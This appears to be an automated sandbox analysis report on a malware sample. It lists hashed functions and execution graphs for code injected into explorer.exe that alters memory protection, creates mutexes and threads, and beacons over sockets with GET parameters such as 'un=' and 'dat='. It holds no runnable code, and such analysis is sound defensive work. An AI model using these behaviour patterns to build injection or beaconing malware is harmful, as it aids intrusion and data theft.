                                                                                                                                                  • Instruction ID: e4d36d49eb96a3a98c0988caea90779eb25460603aa6912449d63901ca6bd336
                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction Fuzzy Hash: 1281D570E496499EDF28EE68C8517FEBBB2BF4531CF184919D892A72D0C7349E40C760
                                                                                                                                                  Function 05CF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                  • Opcode ID: 88152e21cea76183d724128bd3f26eb2808795f51faccd511de9feda6b037476
                                                                                                                                                  • Instruction ID: 63dfae8ff5f40ef19a04dfdd032e8db7c561406a728fc46217af71b9786d7417
                                                                                                                                                  • Opcode Fuzzy Hash: 88152e21cea76183d724128bd3f26eb2808795f51faccd511de9feda6b037476
                                                                                                                                                  • Instruction Fuzzy Hash: 7621627AA00119ABDB50DF79CC45AFFBBF9EF44644F444926EA05E3200EB30DA019BA5
                                                                                                                                                  Function 05C6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 05CB031E
                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 05CB02E7
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 05CB02BD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  • Opcode ID: 1624d6ec400f144a7c8570b82cc81e9f9dd8b235fc73e34998a0eede991c994c
                                                                                                                                                  • Instruction ID: 30270af585d20e9da5bc75004f1961818548dbe4fda8a272198ccdb8a7ba64c8
                                                                                                                                                  • Opcode Fuzzy Hash: 1624d6ec400f144a7c8570b82cc81e9f9dd8b235fc73e34998a0eede991c994c
                                                                                                                                                  • Instruction Fuzzy Hash: D8E1C0306087419FE725CF28D888B6AB7E1BF85314F140E5DF5A69B2D1D774EA44CB42
                                                                                                                                                  Function 05C7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 05CB7BAC
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05CB7B7F
                                                                                                                                                  • RTL: Resource at %p, xrefs: 05CB7B8E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  • Opcode ID: 4a065cd6346f1f4de2cfbf8b3e78616e25bf7c36ed065ad91389eba151a595a9
                                                                                                                                                  • Instruction ID: dd768ab125e57ed8b27ff22dfe7384275142ca42bc02cf9a30ecf9ea5cddb881
                                                                                                                                                  • Opcode Fuzzy Hash: 4a065cd6346f1f4de2cfbf8b3e78616e25bf7c36ed065ad91389eba151a595a9
                                                                                                                                                  • Instruction Fuzzy Hash: 3341D3393047069FD724DE25C840B66B7E6FF85714F000E1DF95AD7680EB71E9059B91
                                                                                                                                                  Function 05C7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05CB728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 05CB72C1
                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05CB7294
                                                                                                                                                  • RTL: Resource at %p, xrefs: 05CB72A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  • Opcode ID: 191fbcbdc0de5aff0952a04c67d1b05833fbb7fa2cb026c8dc602b8f57fa9af4
                                                                                                                                                  • Instruction ID: cfce4a80fe0811f7ee9b435c0897c399eae187706e15643efc51353c21d247af
                                                                                                                                                  • Opcode Fuzzy Hash: 191fbcbdc0de5aff0952a04c67d1b05833fbb7fa2cb026c8dc602b8f57fa9af4
                                                                                                                                                  • Instruction Fuzzy Hash: 3A410E31704206ABDB21DE25CC45FAAB7E6FB84714F100E19FC56EB640EB71E9429BD1
                                                                                                                                                  Function 05CF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: 84f179dbedce39d7cb995ca0f916d665220bbc7d23fccce59bed2b79382e7eca
                                                                                                                                                  • Instruction ID: 14de9712588053820c69362c099f39224915c9616e92243934158729e68ea656
                                                                                                                                                  • Opcode Fuzzy Hash: 84f179dbedce39d7cb995ca0f916d665220bbc7d23fccce59bed2b79382e7eca
                                                                                                                                                  • Instruction Fuzzy Hash: 82318476A006199FCB60DE29CC45BFEB7BCFB44610F441956E949E3200EB30EA489BA0
                                                                                                                                                  Function 05C87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction ID: 084743b3132342efce170bc6c0e45763de96e3f4e998c2815e99448046bbfcf4
                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction Fuzzy Hash: E191A374E042159FDB24EE6AC880ABEB7E6FF44328F644D1AE855E72C0F7369A41C710
                                                                                                                                                  Function 05C49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: 0baaf538499f937bacd323599ae26ef35655c87c3564a0d64ea206a5ce790119
                                                                                                                                                  • Instruction ID: cca7968400af03e358b9d34403b385aa6af9dd2e34972317ab74a414f70ef570
                                                                                                                                                  • Opcode Fuzzy Hash: 0baaf538499f937bacd323599ae26ef35655c87c3564a0d64ea206a5ce790119
                                                                                                                                                  • Instruction Fuzzy Hash: 60812976D052799BDB21CB54CC49BEABBB4AB48714F0045EAA90AB7250D7309E84CFA4

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:11.4%
                                                                                                                                                  Total number of Nodes:79
                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                  execution_graph 26910 e7e52dd 26911 e7e531a 26910->26911 26912 e7e53fa 26911->26912 26913 e7e5328 SleepEx 26911->26913 26917 e7eff12 7 API calls 26911->26917 26918 e7e6432 NtCreateFile 26911->26918 26919 e7e50f2 6 API calls 26911->26919 26913->26911 26913->26913 26917->26911 26918->26911 26919->26911 26920 e7f1bac 26921 e7f1bb1 26920->26921 26954 e7f1bb6 26921->26954 26955 e7e7b72 26921->26955 26923 e7f1c2c 26924 e7f1c85 26923->26924 26925 e7f1c69 26923->26925 26926 e7f1c54 26923->26926 26923->26954 26969 e7efab2 NtProtectVirtualMemory 26924->26969 26929 e7f1c6e 26925->26929 26930 e7f1c80 26925->26930 26965 e7efab2 NtProtectVirtualMemory 26926->26965 26967 e7efab2 NtProtectVirtualMemory 26929->26967 26930->26924 26934 e7f1c97 26930->26934 26931 e7f1c8d 26970 e7e9102 ObtainUserAgentString NtProtectVirtualMemory 26931->26970 26932 e7f1c5c 26966 e7e8ee2 ObtainUserAgentString NtProtectVirtualMemory 26932->26966 26936 e7f1cbe 26934->26936 26937 e7f1c9c 26934->26937 26941 e7f1cd9 26936->26941 26942 e7f1cc7 26936->26942 26936->26954 26959 e7efab2 NtProtectVirtualMemory 26937->26959 26939 e7f1c76 26968 e7e8fc2 ObtainUserAgentString NtProtectVirtualMemory 26939->26968 26941->26954 26973 e7efab2 NtProtectVirtualMemory 26941->26973 26971 e7efab2 NtProtectVirtualMemory 26942->26971 26946 e7f1cac 26960 e7e8de2 ObtainUserAgentString 26946->26960 26947 e7f1ccf 26972 e7e92f2 ObtainUserAgentString NtProtectVirtualMemory 26947->26972 26949 e7f1ce5 26974 e7e9712 ObtainUserAgentString NtProtectVirtualMemory 26949->26974 26952 e7f1cb4 26961 e7e5412 26952->26961 26956 e7e7b93 26955->26956 26957 e7e7cb5 CreateMutexExW 26956->26957 26958 e7e7cce 26956->26958 26957->26958 26958->26923 26959->26946 26960->26952 26963 e7e5440 26961->26963 26962 e7e5473 26962->26954 26963->26962 26964 e7e544d CreateThread 26963->26964 26964->26954 26965->26932 26966->26954 26967->26939 26968->26954 26969->26931 26970->26954 26971->26947 26972->26954 26973->26949 26974->26954 26975 e7eb8c2 26976 e7eb934 26975->26976 26977 e7eb9a6 26976->26977 26978 e7eb995 ObtainUserAgentString 26976->26978 26978->26977 26979 e7f0232 26980 e7f025c 26979->26980 26982 e7f0334 26979->26982 26981 e7f0410 NtCreateFile 26980->26981 26980->26982 26981->26982 26983 e7f1e12 26987 e7f0942 26983->26987 26985 e7f1e45 NtProtectVirtualMemory 26986 e7f1e70 26985->26986 26988 e7f0967 26987->26988 26988->26985 26989 e7f0f82 26991 e7f0fb8 26989->26991 26990 e7f1022 26991->26990 26994 e7f1081 26991->26994 27001 e7ed5b2 26991->27001 26993 e7f1134 26993->26990 26998 e7f11b2 26993->26998 27004 e7ed732 26993->27004 26994->26990 26994->26993 26996 e7f1117 getaddrinfo 26994->26996 26996->26993 26998->26990 27007 e7ed6b2 26998->27007 26999 e7f17f4 setsockopt recv 26999->26990 27000 e7f1729 27000->26990 27000->26999 27002 e7ed5ec 27001->27002 27003 e7ed60a socket 27001->27003 27002->27003 27003->26994 27005 e7ed76a 27004->27005 27006 e7ed788 connect 27004->27006 27005->27006 27006->26998 27008 e7ed6e7 27007->27008 27009 e7ed705 send 27007->27009 27008->27009 27009->27000

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 0E7F0F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 e7f0f82-e7f0fb6 1 e7f0fb8-e7f0fbc 0->1 2 e7f0fd6-e7f0fd9 0->2 1->2 3 e7f0fbe-e7f0fc2 1->3 4 e7f0fdf-e7f0fed 2->4 5 e7f18fe-e7f190c 2->5 3->2 6 e7f0fc4-e7f0fc8 3->6 7 e7f18f6-e7f18f7 4->7 8 e7f0ff3-e7f0ff7 4->8 6->2 9 e7f0fca-e7f0fce 6->9 7->5 10 e7f0fff-e7f1000 8->10 11 e7f0ff9-e7f0ffd 8->11 9->2 12 e7f0fd0-e7f0fd4 9->12 13 e7f100a-e7f1010 10->13 11->10 11->13 12->2 12->4 14 e7f103a-e7f1060 13->14 15 e7f1012-e7f1020 13->15 17 e7f1068-e7f107c call e7ed5b2 14->17 18 e7f1062-e7f1066 14->18 15->14 16 e7f1022-e7f1026 15->16 16->7 19 e7f102c-e7f1035 16->19 22 e7f1081-e7f10a2 17->22 18->17 20 e7f10a8-e7f10ab 18->20 19->7 23 e7f1144-e7f1150 20->23 24 e7f10b1-e7f10b8 20->24 22->20 25 e7f18ee-e7f18ef 22->25 23->25 28 e7f1156-e7f1165 23->28 26 e7f10ba-e7f10dc call e7f0942 24->26 27 e7f10e2-e7f10f5 24->27 25->7 26->27 27->25 30 e7f10fb-e7f1101 27->30 31 e7f117f-e7f118f 28->31 32 e7f1167-e7f1178 call e7ed552 28->32 30->25 36 e7f1107-e7f1109 30->36 33 e7f11e5-e7f121b 31->33 34 e7f1191-e7f11ad call e7ed732 31->34 32->31 40 e7f122d-e7f1231 33->40 41 e7f121d-e7f122b 33->41 43 e7f11b2-e7f11da 34->43 36->25 42 e7f110f-e7f1111 36->42 45 e7f1247-e7f124b 40->45 46 e7f1233-e7f1245 40->46 44 e7f127f-e7f1280 41->44 42->25 47 e7f1117-e7f1132 getaddrinfo 42->47 43->33 49 e7f11dc-e7f11e1 43->49 48 e7f1283-e7f12e0 call e7f1d62 call e7ee482 call e7ede72 call e7f2002 44->48 50 e7f124d-e7f125f 45->50 51 e7f1261-e7f1265 45->51 46->44 47->23 52 e7f1134-e7f113c 47->52 63 e7f12f4-e7f1354 call e7f1d92 48->63 64 e7f12e2-e7f12e6 48->64 49->33 50->44 54 e7f126d-e7f1279 51->54 55 e7f1267-e7f126b 51->55 52->23 54->44 55->48 55->54 69 e7f148c-e7f14b8 call e7f1d62 call e7f2262 63->69 70 e7f135a-e7f1396 call e7f1d62 call e7f2262 call e7f2002 63->70 64->63 65 e7f12e8-e7f12ef call e7ee042 64->65 65->63 79 e7f14ba-e7f14d5 69->79 80 e7f14d9-e7f1590 call e7f2262 * 3 call e7f2002 * 2 call e7ee482 69->80 85 e7f13bb-e7f13e9 call e7f2262 * 2 70->85 86 e7f1398-e7f13b7 call e7f2262 call e7f2002 70->86 79->80 111 e7f1595-e7f15b9 call e7f2262 80->111 100 e7f13eb-e7f1410 call e7f2002 call e7f2262 85->100 101 e7f1415-e7f141d 85->101 86->85 100->101 104 e7f141f-e7f1425 101->104 105 e7f1442-e7f1448 101->105 108 e7f1467-e7f1487 call e7f2262 104->108 109 e7f1427-e7f143d 104->109 110 e7f144e-e7f1456 105->110 105->111 108->111 109->111 110->111 115 e7f145c-e7f145d 110->115 121 e7f15bb-e7f15cc call e7f2262 call e7f2002 111->121 122 e7f15d1-e7f16ad call e7f2262 * 7 call e7f2002 call e7f1d62 call e7f2002 call e7ede72 call e7ee042 111->122 115->108 133 e7f16af-e7f16b3 121->133 122->133 135 e7f16ff-e7f172d call e7ed6b2 133->135 136 e7f16b5-e7f16fa call e7ed382 call e7ed7b2 133->136 145 e7f172f-e7f1735 135->145 146 e7f175d-e7f1761 135->146 157 e7f18e6-e7f18e7 136->157 145->146 151 e7f1737-e7f174c 145->151 147 e7f190d-e7f1913 146->147 148 e7f1767-e7f176b 146->148 152 e7f1779-e7f1784 147->152 153 e7f1919-e7f1920 147->153 154 e7f18aa-e7f18df call e7ed7b2 148->154 155 e7f1771-e7f1773 148->155 151->146 158 e7f174e-e7f1754 151->158 160 e7f1786-e7f1793 152->160 161 e7f1795-e7f1796 152->161 153->160 154->157 155->152 155->154 157->25 158->146 159 e7f1756 158->159 159->146 160->161 164 e7f179c-e7f17a0 160->164 161->164 167 e7f17a2-e7f17af 164->167 168 e7f17b1-e7f17b2 164->168 167->168 170 e7f17b8-e7f17c4 167->170 168->170 173 e7f17c6-e7f17ef call e7f1d92 call e7f1d62 170->173 174 e7f17f4-e7f1861 setsockopt recv 170->174 173->174 175 e7f18a3-e7f18a4 174->175 176 e7f1863 174->176 175->154 176->175 179 e7f1865-e7f186a 176->179 179->175 182 e7f186c-e7f1872 179->182 182->175 185 e7f1874-e7f18a1 182->185 185->175 185->176
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: getaddrinforecvsetsockopt
                                                                                                                                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                  • API String ID: 1564272048-1117930895
                                                                                                                                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                  • Instruction ID: fc7e1f8fdd0e29b4f0fa322eb5603dbfd3219c90fd991843ae76058d7de25c88
                                                                                                                                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                  • Instruction Fuzzy Hash: E352A231614A48CFCB29EF68D4947EAB7E1FB54300F904A2EC59FC7266DE30A945CB45
                                                                                                                                                  Function 0E7F0232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 299 e7f0232-e7f0256 300 e7f08bd-e7f08cd 299->300 301 e7f025c-e7f0260 299->301 301->300 302 e7f0266-e7f02a0 301->302 303 e7f02bf 302->303 304 e7f02a2-e7f02a6 302->304 305 e7f02c6 303->305 304->303 306 e7f02a8-e7f02ac 304->306 307 e7f02cb-e7f02cf 305->307 308 e7f02ae-e7f02b2 306->308 309 e7f02b4-e7f02b8 306->309 310 e7f02f9-e7f030b 307->310 311 e7f02d1-e7f02f7 call e7f0942 307->311 308->305 309->307 312 e7f02ba-e7f02bd 309->312 316 e7f0378 310->316 317 e7f030d-e7f0332 310->317 311->310 311->316 312->307 318 e7f037a-e7f03a0 316->318 319 e7f0334-e7f033b 317->319 320 e7f03a1-e7f03a8 317->320 323 e7f033d-e7f0360 call e7f0942 319->323 324 e7f0366-e7f0370 319->324 321 e7f03aa-e7f03d3 call e7f0942 320->321 322 e7f03d5-e7f03dc 320->322 321->316 321->322 326 e7f03de-e7f040a call e7f0942 322->326 327 e7f0410-e7f0458 NtCreateFile call e7f0172 322->327 323->324 324->316 329 e7f0372-e7f0373 324->329 326->316 326->327 335 e7f045d-e7f045f 327->335 329->316 335->316 336 e7f0465-e7f046d 335->336 336->316 337 e7f0473-e7f0476 336->337 338 e7f0478-e7f0481 337->338 339 e7f0486-e7f048d 337->339 338->318 340 e7f048f-e7f04b8 call e7f0942 339->340 341 e7f04c2-e7f04ec 339->341 340->316 346 e7f04be-e7f04bf 340->346 347 e7f08ae-e7f08b8 341->347 348 e7f04f2-e7f04f5 341->348 346->341 347->316 349 e7f04fb-e7f04fe 348->349 350 e7f0604-e7f0611 348->350 352 e7f055e-e7f0561 349->352 353 e7f0500-e7f0507 349->353 350->318 354 e7f0567-e7f0572 352->354 355 e7f0616-e7f0619 352->355 356 e7f0509-e7f0532 call e7f0942 353->356 357 e7f0538-e7f0559 353->357 362 e7f0574-e7f059d call e7f0942 354->362 363 e7f05a3-e7f05a6 354->363 359 e7f061f-e7f0626 355->359 360 e7f06b8-e7f06bb 355->360 356->316 356->357 361 e7f05e9-e7f05fa 357->361 366 e7f0628-e7f0651 call e7f0942 359->366 367 e7f0657-e7f066b call e7f1e92 359->367 370 e7f06bd-e7f06c4 360->370 371 e7f0739-e7f073c 360->371 361->350 362->316 362->363 363->316 369 e7f05ac-e7f05b6 363->369 366->316 366->367 367->316 388 e7f0671-e7f06b3 367->388 369->316 377 e7f05bc-e7f05e6 369->377 378 e7f06c6-e7f06ef call e7f0942 370->378 379 e7f06f5-e7f0734 370->379 374 e7f07c4-e7f07c7 371->374 375 e7f0742-e7f0749 371->375 374->316 384 e7f07cd-e7f07d4 374->384 382 e7f074b-e7f0774 call e7f0942 375->382 383 e7f077a-e7f07bf 375->383 377->361 378->347 378->379 394 e7f0894-e7f08a9 379->394 382->347 382->383 383->394 390 e7f07fc-e7f0803 384->390 391 e7f07d6-e7f07f6 call e7f0942 384->391 388->318 392 e7f082b-e7f0835 390->392 393 e7f0805-e7f0825 call e7f0942 390->393 391->390 392->347 400 e7f0837-e7f083e 392->400 393->392 394->318 400->347 403 e7f0840-e7f0886 400->403 403->394
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: `
                                                                                                                                                  • API String ID: 823142352-2679148245
                                                                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                  • Instruction ID: 68eb87b0b4c1efc0bc4c2787d55760f6db4e93c615400438fd599dc8d00b71ea
                                                                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                  • Instruction Fuzzy Hash: 66222B70A28A09DFCB59DF28C4996AAF7E1FB98301F40462ED55ED3361DF30A851CB81
                                                                                                                                                  Function 0E7F1E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 443 e7f1e12-e7f1e6e call e7f0942 NtProtectVirtualMemory 446 e7f1e7d-e7f1e8f 443->446 447 e7f1e70-e7f1e7c 443->447
                                                                                                                                                  APIs
                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0E7F1E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                  • Instruction ID: d62d6b8cdb9649a78c808fc1b95c1a81a2ba046d5837e3ef3acc728665c6f8d8
                                                                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                  • Instruction Fuzzy Hash: A401B134628B488F9B88EF6CD48422AB7E4FBCD315F000B3EE99AC3251EB70C9414742
                                                                                                                                                  Function 0E7F1E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 448 e7f1e0a-e7f1e38 449 e7f1e45-e7f1e6e NtProtectVirtualMemory 448->449 450 e7f1e40 call e7f0942 448->450 451 e7f1e7d-e7f1e8f 449->451 452 e7f1e70-e7f1e7c 449->452 450->449
                                                                                                                                                  APIs
                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0E7F1E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                  • Instruction ID: a8dd190a17bfef11053ac05b1636b8c8cae61bdd6cc53186dcbffb1bd5aab821
                                                                                                                                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                  • Instruction Fuzzy Hash: E801A734628B884B9744EF2C94552A6B3E5FBCE314F400B3EE59AC3251DB21D5014782
                                                                                                                                                  Function 0E7EB8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0E7EB9A0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction ID: 004f295c4f60145deebd5c3a43490dea71641d8f5a5363d78dd8110998097e89
                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction Fuzzy Hash: CE31D131614A4D8FCB14EFA8C8887EDBBE0FB58204F40462AD54ED7361DF748A45C789
                                                                                                                                                  Function 0E7EB8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0E7EB9A0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AgentObtainStringUser
